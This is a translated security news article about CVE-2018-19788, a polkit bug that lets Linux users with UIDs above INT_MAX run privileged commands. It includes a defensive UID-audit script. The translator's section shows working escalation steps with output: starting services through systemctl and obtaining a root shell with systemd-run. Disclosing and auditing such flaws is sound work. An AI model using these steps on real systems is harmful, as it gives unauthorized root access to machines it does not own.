Unprivileged Linux users with UID > INT_MAX can execute any command.

Original author: Mohit Kumar
  • Translation
Sit down, I have news that will shock you...

There is a glaring vulnerability in Linux operating systems that allows a low-privileged user to execute any systemctl command (and even obtain a root shell) if their UID is greater than 2147483647.


The vulnerability, tracked as CVE-2018-19788, is in the PolicyKit library (also known as polkit) version 0.115, which comes pre-installed on most popular Linux distributions, including Red Hat, Debian, Ubuntu, and CentOS. Polkit is a component of UNIX-like systems used to define policies and to grant unprivileged processes controlled access to privileged ones. Unlike “sudo”, it does not give the user's process administrative privileges outright; instead it lets you control precisely what is allowed and what is prohibited.

The vulnerability exists because PolicyKit mishandles permission requests for any user whose UID is greater than INT_MAX. INT_MAX is the constant holding the maximum value of a signed 32-bit integer variable, which is 2147483647 (0x7FFFFFFF in hexadecimal).

Thus, if an account is created with any UID exceeding INT_MAX, PolicyKit will let that account successfully execute any systemctl command.

Security researcher Rich Mirch, who goes by “0xm1rch” on Twitter, released a proof-of-concept (PoC) exploit that demonstrates the vulnerability; it requires a user with a UID of 4 billion.

Red Hat recommends that system administrators not allow any negative UID, or any UID greater than 2147483646, to mitigate the problem until the patch is released.
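The two paragraphs above describe the root cause (a UID larger than INT_MAX does not fit in a 32-bit signed integer and wraps to a negative value) and Red Hat's interim mitigation (no negative UIDs and no UIDs above 2147483646). The script below is an added example, not code from the article, from polkit or from Red Hat: it audits a passwd-format file for accounts in the disallowed range and shows the value such a UID takes when stored in a 32-bit signed 'gint', which is the number GLib prints in the warnings quoted later in the article. The sample accounts are constructed; the function names gint_value and audit_passwd are the example's own.

```shell
#!/bin/sh
# Added example (not from the article or from polkit): audit passwd-style
# data for UIDs that Red Hat advised against while the CVE-2018-19788 fix
# was pending (negative or > 2147483646), and show how such a UID wraps
# when truncated to a 32-bit signed 'gint'.

INT_MAX=2147483647

# gint_value UID: the value a UID takes after truncation to a 32-bit signed
# integer (two's complement), i.e. the number the GLib warning reports.
gint_value() {
    awk -v u="$1" 'BEGIN {
        u = u % 4294967296                    # keep the low 32 bits
        if (u > 2147483647) u -= 4294967296   # wrap into the negative range
        printf "%.0f\n", u
    }'
}

# audit_passwd FILE: print "name:uid:gint" for every account whose UID is
# non-numeric, negative, or above 2147483646; prints nothing when clean.
audit_passwd() {
    awk -F: '
        $3 !~ /^[0-9]+$/ || $3 + 0 > 2147483646 {
            u = $3 + 0
            g = u % 4294967296
            if (g > 2147483647) g -= 4294967296
            printf "%s:%s:%.0f\n", $1, $3, g
        }
    ' "$1"
}

# Constructed sample in /etc/passwd format (not a real system's file).
# UID 2147483650 is the one that shows up as -2147483646 in the GLib
# warning; 4000000000 is the "4 billion" PoC user from the article.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bigid:x:2147483650:100:Overflow test:/home/bigid:/bin/bash
poc:x:4000000000:100:PoC user:/home/poc:/bin/bash
EOF

audit_passwd "$SAMPLE"
# bigid:2147483650:-2147483646
# poc:4000000000:-294967296
rm -f "$SAMPLE"
```

On a live host you would point audit_passwd at /etc/passwd (and at any directory exports that feed NSS, since the UID need not come from the local file); an empty result means no account sits in the range the mitigation forbids.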

Several exploitation methods, from the translator

The first way is simply via systemctl. I created a user with a large UID, then tried to start apache2:

1) first I checked that it was down

$ systemctl status apache2
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
   Active: inactive (dead)

2) tried to run, but got an error

$ systemctl start apache2
(process:2820): GLib-GObject-WARNING **: 00:42:35.586: value "-2147483646" of type'gint' is invalid or out of range for property 'uid' of type'gint'
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)

3) but then confirmed that it had started anyway

$ systemctl status apache2
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
  Drop-In: /lib/systemd/system/apache2.service.d
   Active: active (running) since Tue 2018-12-11 00:42:35 +04; 2s ago
  Process: 2825 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCE
 Main PID: 2829 (apache2)
    Tasks: 55 (limit: 4526)
   CGroup: /system.slice/apache2.service
           ├─2829 /usr/sbin/apache2 -k start
           ├─2830 /usr/sbin/apache2 -k start
           └─2831 /usr/sbin/apache2 -k start

The second way is to run bash through systemd. I executed the following command, created a text file in the root of the filesystem, added a line to it, and checked the result:

$  systemd-run -t /bin/bash
(process:3947): GLib-GObject-WARNING **: 01:24:30.023: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Running as unit: run-u107.service
Press ^] three times within 1s to disconnect TTY.
# echo hello > /test.txt
# cat /test.txt

While experimenting on my Ubuntu, I discovered another pattern: if you open the account settings while logged in as a user with such a UID, all settings are unlocked, which lets you edit or delete any user.

The question remains how to “cause” a user with such a UID to appear on the victim host, and whether this bug really poses a threat.
